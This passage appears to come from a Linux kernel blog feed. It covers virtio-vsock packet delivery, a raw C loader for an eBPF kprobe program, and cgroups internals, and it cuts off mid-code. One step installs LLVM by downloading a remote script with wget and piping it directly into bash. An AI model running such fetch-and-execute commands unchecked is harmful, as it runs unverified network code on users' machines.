ret = virtqueue_add_sgs(vq, sgs, out_sg, in_sg, pkt, GFP_KERNEL);
/* Usually this means that there is no more space available in
* the vq
*/
...
added = true;
}
if (added)
virtqueue_kick(vq);
...
}
</code></pre></div></div>
<h4> host recv </h4>
<p>The host side’s handle for the tx queue kick is ‘vhost_vsock_handle_tx_kick’, this is initialized in ‘vhost_vsock_dev_open’ function.</p>
<p>‘vhost_vsock_handle_tx_kick’ also perform the virtio backedn standard operation, pop the vring desc and calls ‘vhost_vsock_alloc_pkt’ to reconstruct a ‘virtio_vsock_pkt’, then calls ‘virtio_transport_recv_pkt’ to delivery the packet to destination.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void vhost_vsock_handle_tx_kick(struct vhost_work *work)
{
struct vhost_virtqueue *vq = container_of(work, struct vhost_virtqueue,
poll.work);
struct vhost_vsock *vsock = container_of(vq->dev, struct vhost_vsock,
dev);
struct virtio_vsock_pkt *pkt;
int head, pkts = 0, total_len = 0;
unsigned int out, in;
bool added = false;
mutex_lock(&vq->mutex);
...
vhost_disable_notify(&vsock->dev, vq);
do {
u32 len;
...
head = vhost_get_vq_desc(vq, vq->iov, ARRAY_SIZE(vq->iov),
&out, &in, NULL, NULL);
...
pkt = vhost_vsock_alloc_pkt(vq, out, in);
...
len = pkt->len;
/* Deliver to monitoring devices all received packets */
virtio_transport_deliver_tap_pkt(pkt);
/* Only accept correctly addressed packets */
if (le64_to_cpu(pkt->hdr.src_cid) == vsock->guest_cid)
virtio_transport_recv_pkt(pkt);
else
virtio_transport_free_pkt(pkt);
len += sizeof(pkt->hdr);
vhost_add_used(vq, head, len);
total_len += len;
added = true;
} while(likely(!vhost_exceeds_weight(vq, ++pkts, total_len)));
...
}
</code></pre></div></div>
<p>‘virtio_transport_recv_pkt’ is the actually function to delivery the msg data. It calls ‘vsock_find_connected_socket’ to find the destination remote socket then according to the dest socket state calls specific function. For ‘TCP_ESTABLISHED’ it calls ‘virtio_transport_recv_connected’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void virtio_transport_recv_pkt(struct virtio_vsock_pkt *pkt)
{
struct sockaddr_vm src, dst;
struct vsock_sock *vsk;
struct sock *sk;
bool space_available;
vsock_addr_init(&src, le64_to_cpu(pkt->hdr.src_cid),
le32_to_cpu(pkt->hdr.src_port));
vsock_addr_init(&dst, le64_to_cpu(pkt->hdr.dst_cid),
le32_to_cpu(pkt->hdr.dst_port));
...
/* The socket must be in connected or bound table
* otherwise send reset back
*/
sk = vsock_find_connected_socket(&src, &dst);
...
vsk = vsock_sk(sk);
...
switch (sk->sk_state) {
case TCP_LISTEN:
virtio_transport_recv_listen(sk, pkt);
virtio_transport_free_pkt(pkt);
break;
case TCP_SYN_SENT:
virtio_transport_recv_connecting(sk, pkt);
virtio_transport_free_pkt(pkt);
break;
case TCP_ESTABLISHED:
virtio_transport_recv_connected(sk, pkt);
break;
case TCP_CLOSING:
virtio_transport_recv_disconnecting(sk, pkt);
virtio_transport_free_pkt(pkt);
break;
default:
virtio_transport_free_pkt(pkt);
break;
}
release_sock(sk);
/* Release refcnt obtained when we fetched this socket out of the
* bound or connected list.
*/
sock_put(sk);
return;
free_pkt:
virtio_transport_free_pkt(pkt);
}
</code></pre></div></div>
<p>For the send data the ‘pkt->hdr.op’ is ‘VIRTIO_VSOCK_OP_RW’ so ‘virtio_transport_recv_enqueue’ will be called. ‘virtio_transport_recv_enqueue’ adds the packet to the destination’s socket’s queue ‘rx_queue’.</p>
<p>So when the host/othere VM calls recv, the ‘vsock_stream_recvmsg’ will be called and the transport layer’s ‘stream_dequeue’ callback(virtio_transport_stream_do_dequeue) will be called. virtio_transport_stream_do_dequeue will pop the entry from ‘rx_queue’ and store it to msghdr and return to the userspace application.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static ssize_t
virtio_transport_stream_do_dequeue(struct vsock_sock *vsk,
struct msghdr *msg,
size_t len)
{
struct virtio_vsock_sock *vvs = vsk->trans;
struct virtio_vsock_pkt *pkt;
size_t bytes, total = 0;
u32 free_space;
int err = -EFAULT;
spin_lock_bh(&vvs->rx_lock);
while (total < len && !list_empty(&vvs->rx_queue)) {
pkt = list_first_entry(&vvs->rx_queue,
struct virtio_vsock_pkt, list);
bytes = len - total;
if (bytes > pkt->len - pkt->off)
bytes = pkt->len - pkt->off;
/* sk_lock is held by caller so no one else can dequeue.
* Unlock rx_lock since memcpy_to_msg() may sleep.
*/
spin_unlock_bh(&vvs->rx_lock);
err = memcpy_to_msg(msg, pkt->buf + pkt->off, bytes);
if (err)
goto out;
spin_lock_bh(&vvs->rx_lock);
total += bytes;
pkt->off += bytes;
if (pkt->off == pkt->len) {
virtio_transport_dec_rx_pkt(vvs, pkt);
list_del(&pkt->list);
virtio_transport_free_pkt(pkt);
}
}
...
return total;
...
}
</code></pre></div></div>
<h3> multi-transport </h3>
<p>From above as we can see one kernel(both host/guest) can only register one transport. This is problematic in nested virtualization environment. For example the host with L0 VMware VM and in it there is a L1 qemu/kvm VM. The L0 VM can only register one transport, if it register the ‘vmci’ transport it can just talk to the VMware vmci device. If it register the ‘vhost_vsock’ it can just talk to the L1 VM.
Fortunately Stefano Garzarella has addressed this issue in commit <a href="https://github.com/torvalds/linux/commit/c0cfa2d8a788fcf45df5bf4070ab2474c88d543a">vsock: add multi-transports support
</a>. Who interested this can learn more.</p>
<h3> Reference </h3>
<ol>
<li><a href="https://vmsplice.net/~stefan/stefanha-kvm-forum-2015.pdf">virtio-vsock Zero-configuration host/guest communication</a>, Stefan Hajnoczi, KVM froum 2015</li>
<li><a href="https://static.sched.com/hosted_files/devconfcz2020a/b1/DevConf.CZ_2020_vsock_v1.1.pdf">VSOCK: VM↔host socket with minimal configuration</a>, Stefano Garzarella, DevConf.CZ 2020</li>
<li><a href="https://stefano-garzarella.github.io/posts/2020-02-20-vsock-nested-vms-loopback/">AF_VSOCK: nested VMs and loopback support available</a></li>
</ol>
Write eBPF program in pure C2020-01-18T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/01/18/ebpf-in-c
<p>While developing new eBPF program type, we need do some small test. We do not want to touch a lot of the libbpf or the higher bcc. What we need is just a eBPF program and loding it to kernel. This post is about how to do this. In this article, I will adds a eBPF program to kprobe tracepoint. This includes three parts, prepare the eBPF program, a loader to load this eBPF program and open the kernel function to kprobe.</p>
<h3> Prepare a eBPF program </h3>
<p>In Debian 9.1 we install a custome kernel(4.9.208). Go to the samples/bpf, and make(first need to isntall clang and llvm).</p>
<p>Add a test_bpf.c in samples/bpf directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <uapi/linux/bpf.h>
#include "bpf_helpers.h"
int bpf_prog(void *ctx) {
char buf[] = "Hello World!\n";
bpf_trace_printk(buf, sizeof(buf));
return 0;
}
</code></pre></div></div>
<p>Add one line in samples/bpf/Makefile right place.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> always += test_bpf.o
</code></pre></div></div>
<p>Then type ‘make’ to compile this bpf program.</p>
<p>Now we get a ‘test_bpf.o’ file. But it contains a lot of ELF file metadata. We need to extract the eBPF program itself out.</p>
<p>First let’s see what the eBPF code is. The first try shows that the Debian’s built-in llvm tools is too old, it doesn’t support ‘-S’ option.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# llvm-objdump -arch-name=bpf -S test_bpf.o
llvm-objdump: Unknown command line argument '-S'. Try: 'llvm-objdump -help'
llvm-objdump: Did you mean '-D'?
</code></pre></div></div>
<p>Got to ‘http://apt.llvm.org/’ and install the new clang and llvm.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bash -c "$(wget -O - https://apt.llvm.org/llvm.sh)"
</code></pre></div></div>
<p>Use the new tool to see the eBPF program.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# llvm-objdump-9 -arch-name=bpf -S test_bpf.o
test_bpf.o: file format ELF64-unknown
Disassembly of section .text:
0000000000000000 bpf_prog:
0: b7 01 00 00 0a 00 00 00 r1 = 10
1: 6b 1a fc ff 00 00 00 00 *(u16 *)(r10 - 4) = r1
2: b7 01 00 00 72 6c 64 21 r1 = 560229490
3: 63 1a f8 ff 00 00 00 00 *(u32 *)(r10 - 8) = r1
4: 18 01 00 00 48 65 6c 6c 00 00 00 00 6f 20 57 6f r1 = 8022916924116329800 ll
6: 7b 1a f0 ff 00 00 00 00 *(u64 *)(r10 - 16) = r1
7: bf a1 00 00 00 00 00 00 r1 = r10
8: 07 01 00 00 f0 ff ff ff r1 += -16
9: b7 02 00 00 0e 00 00 00 r2 = 14
10: 85 00 00 00 06 00 00 00 call 6
11: b7 00 00 00 00 00 00 00 r0 = 0
12: 95 00 00 00 00 00 00 00 exit
root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf#
</code></pre></div></div>
<p>As we can see, the eBPF code is contained in the .text section of ‘test_bpf.o’, it’s size is 13*8=104.</p>
<p>Use the dd to dump the eBPF code.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# dd if=./test_bpf.o of=test_bpf bs=1 count=104 skip=64
104+0 records in
104+0 records out
104 bytes copied, 0.000221178 s, 470 kB/s
root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# hexdump test_bpf
0000000 01b7 0000 000a 0000 1a6b fffc 0000 0000
0000010 01b7 0000 6c72 2164 1a63 fff8 0000 0000
0000020 0118 0000 6548 6c6c 0000 0000 206f 6f57
0000030 1a7b fff0 0000 0000 a1bf 0000 0000 0000
0000040 0107 0000 fff0 ffff 02b7 0000 000e 0000
0000050 0085 0000 0006 0000 00b7 0000 0000 0000
0000060 0095 0000 0000 0000
0000068
</code></pre></div></div>
<p>OK, now we have our eBPF program ‘test_bpf’, it contains a ‘helloworld’ eBPF program.</p>
<h3> Open the perf event kprobe </h3>
<p>And get the event id:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@192:/home/test/linux-4.9.208/linux-4.9.208# echo 'p:sys_clone sys_clone' >> /sys/kernel/debug/tracing/kprobe_events
root@192:/home/test/linux-4.9.208/linux-4.9.208# cat /sys/kernel/debug/tracing/events/kprobes/sys_clone/id
1254
</code></pre></div></div>
<h3> Write a loader </h3>
<p>The source code of loader is as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define _GNU_SOURCE
#include <unistd.h>
#include <string.h>
#include <sys/syscall.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <linux/version.h>
#include <linux/perf_event.h>
#include <linux/hw_breakpoint.h>
#include <errno.h>
int main()
{
int bfd;
unsigned char buf[1024] = {};
struct bpf_insn *insn;
union bpf_attr attr = {};
unsigned char log_buf[4096] = {};
int ret;
int efd;
int pfd;
int n;
int i;
struct perf_event_attr pattr = {};
bfd = open("./test_bpf", O_RDONLY);
if (bfd < 0)
{
printf("open eBPF program error: %s\n", strerror(errno));
exit(-1);
}
n = read(bfd, buf, 1024);
for (i = 0; i < n; ++i)
{
printf("%02x ", buf[i]);
if (i % 8 == 0)
printf("\n");
}
close(bfd);
insn = (struct bpf_insn*)buf;
attr.prog_type = BPF_PROG_TYPE_KPROBE;
attr.insns = (unsigned long)insn;
attr.insn_cnt = n / sizeof(struct bpf_insn);
attr.license = (unsigned long)"GPL";
attr.log_size = sizeof(log_buf);
attr.log_buf = (unsigned long)log_buf;
attr.log_level = 1;
attr.kern_version = 264656;
pfd = syscall(SYS_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
if (pfd < 0)
{
printf("bpf syscall error: %s\n", strerror(errno));
printf("log_buf = %s\n", log_buf);
exit(-1);
}
pattr.type = PERF_TYPE_TRACEPOINT;
pattr.sample_type = PERF_SAMPLE_RAW;
pattr.sample_period = 1;
pattr.wakeup_events = 1;
pattr.config = 1254;
pattr.size = sizeof(pattr);
efd = syscall(SYS_perf_event_open, &pattr, -1, 0, -1, 0);
if (efd < 0)
{
printf("perf_event_open error: %s\n", strerror(errno));
exit(-1);
}
ret = ioctl(efd, PERF_EVENT_IOC_ENABLE, 0);
if (ret < 0)
{
printf("PERF_EVENT_IOC_ENABLE error: %s\n", strerror(errno));
exit(-1);
}
ret = ioctl(efd, PERF_EVENT_IOC_SET_BPF, pfd);
if (ret < 0)
{
printf("PERF_EVENT_IOC_SET_BPF error: %s\n", strerror(errno));
exit(-1);
}
while(1);
}
</code></pre></div></div>
<p>Something notice:</p>
<ol>
<li>
<p>I first uses the eBPF as a ‘BPF_PROG_TYPE_TRACEPOINT’ to attach to the syscalls tracepoints. But it works, I was quite confusion about this until I read this:
https://github.com/iovisor/bcc/issues/748 . So I switch to use kprobe.</p>
</li>
<li>
<p>The ‘attr.kern_version’ is read from linux-4.9.208/usr/include/linux/version.h file ‘LINUX_VERSION_CODE’</p>
</li>
<li>
<p>The last ‘while’ is to pin the eBPF in program, also there is method to pin I use ‘while’ to simplify thing.</p>
</li>
</ol>
<p>Before we execute the ‘test_loader’, we first read the ‘/sys/kernel/debug/tracing/trace_pipe’ in Terminal 1, this is where the ‘bpf_trace_printk’ output goes.</p>
<p>Then run the ‘test_loader’ in Terminal 2and we can see the output from Terminal 1 as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@192:/home/test/linux-4.9.208/linux-4.9.208# cat /sys/kernel/debug/tracing/trace_pipe
bash-13708 [003] d... 51890.256702: : Hello World!
bash-13708 [001] d... 51905.890740: : Hello World!
bash-13708 [000] d... 52578.776651: : Hello World!
gnome-shell-1429 [000] d... 52581.579554: : Hello World!
gnome-shell-1429 [001] d... 52582.922830: : Hello World!
gnome-shell-13773 [000] d... 52582.937085: : Hello World!
</code></pre></div></div>
cgroups internals2020-01-05T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/01/05/cgroup-internlas
<h3> Concepts </h3>
<p>Control groups provide a mechanism to group process/tasks to control there behaviour(limit resource for example). Some of the Concepts:</p>
<p>cgroup: a set of tasks with a set of parameters for one or more subsystems.</p>
<p>subsystem: a recource controller that schedules a resource or applies per-cgroup limits.</p>
<p>hierarchy: a set of cgroups arranged in a tree. Every task in the system is in exactly one of the cgroups in the hierarchy and a set of subsystems.</p>
<p>Cgroups is the fundamental mechanism used by docker. This post will dig into how cgroup is implemented. This post uses kernel 4.4.</p>
<h3> Basic structure </h3>
<p>task_struct has a ‘cgroups’ field which points a ‘struct css_set’, this contains the process’s cgroups info.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct css_set {
/* Reference count */
atomic_t refcount;
/*
* List running through all cgroup groups in the same hash
* slot. Protected by css_set_lock
*/
struct hlist_node hlist;
/*
* Lists running through all tasks using this cgroup group.
* mg_tasks lists tasks which belong to this cset but are in the
* process of being migrated out or in. Protected by
* css_set_rwsem, but, during migration, once tasks are moved to
* mg_tasks, it can be read safely while holding cgroup_mutex.
*/
struct list_head tasks;
struct list_head mg_tasks;
/*
* List of cgrp_cset_links pointing at cgroups referenced from this
* css_set. Protected by css_set_lock.
*/
struct list_head cgrp_links;
/* the default cgroup associated with this css_set */
struct cgroup *dfl_cgrp;
/*
* Set of subsystem states, one for each subsystem. This array is
* immutable after creation apart from the init_css_set during
* subsystem registration (at boot time).
*/
struct cgroup_subsys_state *subsys[CGROUP_SUBSYS_COUNT];
/*
* List of csets participating in the on-going migration either as
* source or destination. Protected by cgroup_mutex.
*/
struct list_head mg_preload_node;
struct list_head mg_node;
/*
* If this cset is acting as the source of migration the following
* two fields are set. mg_src_cgrp is the source cgroup of the
* on-going migration and mg_dst_cset is the destination cset the
* target tasks on this cset should be migrated to. Protected by
* cgroup_mutex.
*/
struct cgroup *mg_src_cgrp;
struct css_set *mg_dst_cset;
/*
* On the default hierarhcy, ->subsys[ssid] may point to a css
* attached to an ancestor instead of the cgroup this css_set is
* associated with. The following node is anchored at
* ->subsys[ssid]->cgroup->e_csets[ssid] and provides a way to
* iterate through all css's attached to a given cgroup.
*/
struct list_head e_cset_node[CGROUP_SUBSYS_COUNT];
/* all css_task_iters currently walking this cset */
struct list_head task_iters;
/* dead and being drained, ignore for migration */
bool dead;
/* For RCU-protected deletion */
struct rcu_head rcu_head;
};
</code></pre></div></div>
<p>The ‘mg_***’ field is used to migrate process from one group to another group.
‘hlist’ is used to link all of the ‘css_set’ that in the same hashtable slots.
‘tasks’ is used to link all of the process using this ‘css_set’.
‘cgrp_links’ is used to link a ‘cgrp_cset_link’ which links ‘css_set’ with ‘cgroup’.
‘subsys’ is an array which points ‘cgroup_subsys_state’. A ‘cgroup_subsys_state’ is a specific control data structure.</p>
<p>‘cgroup_subsys_state’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct cgroup_subsys_state {
/* PI: the cgroup that this css is attached to */
struct cgroup *cgroup;
/* PI: the cgroup subsystem that this css is attached to */
struct cgroup_subsys *ss;
/* reference count - access via css_[try]get() and css_put() */
struct percpu_ref refcnt;
/* PI: the parent css */
struct cgroup_subsys_state *parent;
/* siblings list anchored at the parent's ->children */
struct list_head sibling;
struct list_head children;
/*
* PI: Subsys-unique ID. 0 is unused and root is always 1. The
* matching css can be looked up using css_from_id().
*/
int id;
unsigned int flags;
/*
* Monotonically increasing unique serial number which defines a
* uniform order among all csses. It's guaranteed that all
* ->children lists are in the ascending order of ->serial_nr and
* used to allow interrupting and resuming iterations.
*/
u64 serial_nr;
/*
* Incremented by online self and children. Used to guarantee that
* parents are not offlined before their children.
*/
atomic_t online_cnt;
/* percpu_ref killing and RCU release */
struct rcu_head rcu_head;
struct work_struct destroy_work;
};
</code></pre></div></div>
<p>The ‘struct cgroup’ member represents the ‘cgroup’ that process attaches to.
‘cgroup_subsys’ member points to a specific subsystem.</p>
<p>In fact ‘cgroup_subsys_state’ is embedded in a specific subsystem cgroup. For example, the memory contontroller ‘mem_cgroup’ has following.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct mem_cgroup {
struct cgroup_subsys_state css;
/* Private memcg ID. Used to ID objects that outlive the cgroup */
struct mem_cgroup_id id;
/* Accounted resources */
struct page_counter memory;
struct page_counter memsw;
struct page_counter kmem;
...
}
</code></pre></div></div>
<p>The ‘css_set’s subsys member points the ‘mem_cgroup’s ‘css’ field.</p>
<p>Following is the definition of ‘struct cgroup’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct cgroup {
/* self css with NULL ->ss, points back to this cgroup */
struct cgroup_subsys_state self;
unsigned long flags; /* "unsigned long" so bitops work */
/*
* idr allocated in-hierarchy ID.
*
* ID 0 is not used, the ID of the root cgroup is always 1, and a
* new cgroup will be assigned with a smallest available ID.
*
* Allocating/Removing ID must be protected by cgroup_mutex.
*/
int id;
/*
* Each non-empty css_set associated with this cgroup contributes
* one to populated_cnt. All children with non-zero popuplated_cnt
* of their own contribute one. The count is zero iff there's no
* task in this cgroup or its subtree.
*/
int populated_cnt;
struct kernfs_node *kn; /* cgroup kernfs entry */
struct cgroup_file procs_file; /* handle for "cgroup.procs" */
struct cgroup_file events_file; /* handle for "cgroup.events" */
/*
* The bitmask of subsystems enabled on the child cgroups.
* ->subtree_control is the one configured through
* "cgroup.subtree_control" while ->child_subsys_mask is the
* effective one which may have more subsystems enabled.
* Controller knobs are made available iff it's enabled in
* ->subtree_control.
*/
unsigned int subtree_control;
unsigned int child_subsys_mask;
/* Private pointers for each registered subsystem */
struct cgroup_subsys_state __rcu *subsys[CGROUP_SUBSYS_COUNT];
struct cgroup_root *root;
/*
* List of cgrp_cset_links pointing at css_sets with tasks in this
* cgroup. Protected by css_set_lock.
*/
struct list_head cset_links;
/*
* On the default hierarchy, a css_set for a cgroup with some
* susbsys disabled will point to css's which are associated with
* the closest ancestor which has the subsys enabled. The
* following lists all css_sets which point to this cgroup's css
* for the given subsystem.
*/
struct list_head e_csets[CGROUP_SUBSYS_COUNT];
/*
* list of pidlists, up to two for each namespace (one for procs, one
* for tasks); created on demand.
*/
struct list_head pidlists;
struct mutex pidlist_mutex;
/* used to wait for offlining of csses */
wait_queue_head_t offline_waitq;
/* used to schedule release agent */
struct work_struct release_agent_work;
};
</code></pre></div></div>
<p>‘struct cgroup’ represents a concrete control group.
‘kn’ is the cgroup kernfs entry.
‘subsys’ is an array points to ‘cgroup_subsys_state’, these represets the subsystem that this ‘cgroup’ contains.
‘cset_links’ is used to link to ‘cgrp_cset_link’.</p>
<p>A ‘css_set’ can be associated with multiple cgroups. And also a ‘cgroup’ can be associated with multiple css_sets as different tasks my belong to differenct cgroups on different hierarchies. So this M:N relationship is represented by ‘struct cgrp_cset_link’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct cgrp_cset_link {
/* the cgroup and css_set this link associates */
struct cgroup *cgrp;
struct css_set *cset;
/* list of cgrp_cset_links anchored at cgrp->cset_links */
struct list_head cset_link;
/* list of cgrp_cset_links anchored at css_set->cgrp_links */
struct list_head cgrp_link;
};
</code></pre></div></div>
<p>Following figures show the data relations:</p>
<p><img src="/assets/img/cgroups/1.png" alt="" /></p>
<h3> Cgroups initialization </h3>
<p>In start_main early state, it calls ‘cgroup_init_early’ to intialize the subsystem that needs early initialization, this is indicated in the ‘struct cgroup_subsys’s early_init member.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int __init cgroup_init_early(void)
{
static struct cgroup_sb_opts __initdata opts;
struct cgroup_subsys *ss;
int i;
init_cgroup_root(&cgrp_dfl_root, &opts);
cgrp_dfl_root.cgrp.self.flags |= CSS_NO_REF;
RCU_INIT_POINTER(init_task.cgroups, &init_css_set);
for_each_subsys(ss, i) {
WARN(!ss->css_alloc || !ss->css_free || ss->name || ss->id,
"invalid cgroup_subsys %d:%s css_alloc=%p css_free=%p name:id=%d:%s\n",
i, cgroup_subsys_name[i], ss->css_alloc, ss->css_free,
ss->id, ss->name);
WARN(strlen(cgroup_subsys_name[i]) > MAX_CGROUP_TYPE_NAMELEN,
"cgroup_subsys_name %s too long\n", cgroup_subsys_name[i]);
ss->id = i;
ss->name = cgroup_subsys_name[i];
if (!ss->legacy_name)
ss->legacy_name = cgroup_subsys_name[i];
if (ss->early_init)
cgroup_init_subsys(ss, true);
}
return 0;
}
</code></pre></div></div>
<p>In ‘cgroup_init_early’, it first initializes ‘cgrp_dfl_root’. This is the default ‘cgroup_root’. This is revserved for the subsystems that are not used. It has a single cgroup, and all tasks are part of that cgroup. Then it sets the ‘init_css_set’ to ‘init_task.cgroups’. So if we don’t use cgroup all of the process will use this ‘init_css_set’ as its task_struct.cgroups. Then it iterates all of the subsystems and calls ‘cgroup_init_subsys’ to initialize them.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __init cgroup_init_subsys(struct cgroup_subsys *ss, bool early)
{
struct cgroup_subsys_state *css;
printk(KERN_INFO "Initializing cgroup subsys %s\n", ss->name);
mutex_lock(&cgroup_mutex);
idr_init(&ss->css_idr);
INIT_LIST_HEAD(&ss->cfts);
/* Create the root cgroup state for this subsystem */
ss->root = &cgrp_dfl_root;
css = ss->css_alloc(cgroup_css(&cgrp_dfl_root.cgrp, ss));
/* We don't handle early failures gracefully */
BUG_ON(IS_ERR(css));
init_and_link_css(css, ss, &cgrp_dfl_root.cgrp);
...
init_css_set.subsys[ss->id] = css;
...
BUG_ON(online_css(css));
mutex_unlock(&cgroup_mutex);
}
</code></pre></div></div>
<p>First ‘cgroup_init_subsys’ sets ‘cgroup_subsys’s root to the default cgroup_root. Then calls the subsystem’s css_alloc callback to allocate a ‘struct cgroup_subsys_state’. The argument here to css_alloc callback is NULL. The subsystem do some special work for this default cgroup_root. For example, the mem cgroup will set the max value of memory limits.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct cgroup_subsys_state * __ref
mem_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
{
struct mem_cgroup *memcg;
long error = -ENOMEM;
int node;
memcg = mem_cgroup_alloc();
if (!memcg)
return ERR_PTR(error);
for_each_node(node)
if (alloc_mem_cgroup_per_zone_info(memcg, node))
goto free_out;
/* root ? */
if (parent_css == NULL) {
root_mem_cgroup = memcg;
mem_cgroup_root_css = &memcg->css;
page_counter_init(&memcg->memory, NULL);
memcg->high = PAGE_COUNTER_MAX;
memcg->soft_limit = PAGE_COUNTER_MAX;
page_counter_init(&memcg->memsw, NULL);
page_counter_init(&memcg->kmem, NULL);
}
...
}
</code></pre></div></div>
<p>After get the ‘cgroup_subsys_state’ in ‘cgroup_init_subsys’, the function then calls ‘init_and_link_css’ to initialize the ‘cgroup_subsys_state’ and online_css to call subsystem’s css_online callback.</p>
<p>In the second stage of initialization ‘cgroup_init’ it does more work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int __init cgroup_init(void)
{
struct cgroup_subsys *ss;
unsigned long key;
int ssid;
BUG_ON(percpu_init_rwsem(&cgroup_threadgroup_rwsem));
BUG_ON(cgroup_init_cftypes(NULL, cgroup_dfl_base_files));
BUG_ON(cgroup_init_cftypes(NULL, cgroup_legacy_base_files));
mutex_lock(&cgroup_mutex);
/* Add init_css_set to the hash table */
key = css_set_hash(init_css_set.subsys);
hash_add(css_set_table, &init_css_set.hlist, key);
BUG_ON(cgroup_setup_root(&cgrp_dfl_root, 0));
mutex_unlock(&cgroup_mutex);
for_each_subsys(ss, ssid) {
if (ss->early_init) {
struct cgroup_subsys_state *css =
init_css_set.subsys[ss->id];
css->id = cgroup_idr_alloc(&ss->css_idr, css, 1, 2,
GFP_KERNEL);
BUG_ON(css->id < 0);
} else {
cgroup_init_subsys(ss, false);
}
list_add_tail(&init_css_set.e_cset_node[ssid],
&cgrp_dfl_root.cgrp.e_csets[ssid]);
...
cgrp_dfl_root.subsys_mask |= 1 << ss->id;
if (!ss->dfl_cftypes)
cgrp_dfl_root_inhibit_ss_mask |= 1 << ss->id;
if (ss->dfl_cftypes == ss->legacy_cftypes) {
WARN_ON(cgroup_add_cftypes(ss, ss->dfl_cftypes));
} else {
WARN_ON(cgroup_add_dfl_cftypes(ss, ss->dfl_cftypes));
WARN_ON(cgroup_add_legacy_cftypes(ss, ss->legacy_cftypes));
}
if (ss->bind)
ss->bind(init_css_set.subsys[ssid]);
}
WARN_ON(sysfs_create_mount_point(fs_kobj, "cgroup"));
WARN_ON(register_filesystem(&cgroup_fs_type));
WARN_ON(!proc_create("cgroups", 0, NULL, &proc_cgroupstats_operations));
return 0;
}
</code></pre></div></div>
<p>First it calls ‘cgroup_init_cftypes’ to initiaze two ‘struct cftype’ ‘cgroup_dfl_base_files’ and ‘cgroup_legacy_base_files’. A ‘cftype’ contains the cgroup control files and its handler. ‘cgroup_dfl_base_files’ is for default hierarchy and ‘cgroup_legacy_base_files’ is for general hierarchy.
Unfortunately, we can’t see cgroup_dfl_base_files files as the linux distros will use cgroup to management, so after the system boot, we can see the cgroup_legacy_base_files files.</p>
<p>Then ‘cgroup_init’ caculate the key of ‘init_css_set.subsys’ and insert it to css_set_table. css_set_table contains all of the ‘css_set’.</p>
<p>‘cgroup_setup_root’ is used to setup a ‘cgroup_root’. This function is also called in cgroup_mount, the ‘ss_mask’ argument is the mask of subsystem.</p>
<p>‘allocate_cgrp_cset_links’ allocates ‘css_set_count’ of ‘cgrp_cset_link’. Later it uses these links to link every currently ‘css_set’ to this new ‘cgroup_root’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> hash_for_each(css_set_table, i, cset, hlist) {
link_css_set(&tmp_links, cset, root_cgrp);
if (css_set_populated(cset))
cgroup_update_populated(root_cgrp, true);
}
</code></pre></div></div>
<p>‘kernfs_create_root’ create a new kernfs hierarchy. This is the root directory of this cgroup. ‘css_populate_dir’ creates the files in the root kernfs directory.</p>
<p>‘rebind_subsystems’ binds this ‘cgroup_root’ to the ‘cgroup_subsys’. The most import code is following. Set the ‘ss->root’ to dst_root.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> for_each_subsys_which(ss, ssid, &ss_mask) {
struct cgroup_root *src_root = ss->root;
struct cgroup *scgrp = &src_root->cgrp;
struct cgroup_subsys_state *css = cgroup_css(scgrp, ss);
struct css_set *cset;
WARN_ON(!css || cgroup_css(dcgrp, ss));
css_clear_dir(css, NULL);
RCU_INIT_POINTER(scgrp->subsys[ssid], NULL);
rcu_assign_pointer(dcgrp->subsys[ssid], css);
ss->root = dst_root;
css->cgroup = dcgrp;
...
}
</code></pre></div></div>
<p>After rebind the cgroup_subsys’s root, the ‘cgroup_setup_root’ nearly finishes his job.</p>
<p>Let’s return to ‘cgroup_init’. It calls ‘cgroup_init_subsys’ to initialize the specific subystem. Then set the bit in ‘cgrp_dfl_root.subsys_mask’.</p>
<p>Following code adds the specific subsystem’s cftype to the subsystem while linking to the the ‘cgroup_subsys’s
cfts list head.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (ss->dfl_cftypes == ss->legacy_cftypes) {
WARN_ON(cgroup_add_cftypes(ss, ss->dfl_cftypes));
} else {
WARN_ON(cgroup_add_dfl_cftypes(ss, ss->dfl_cftypes));
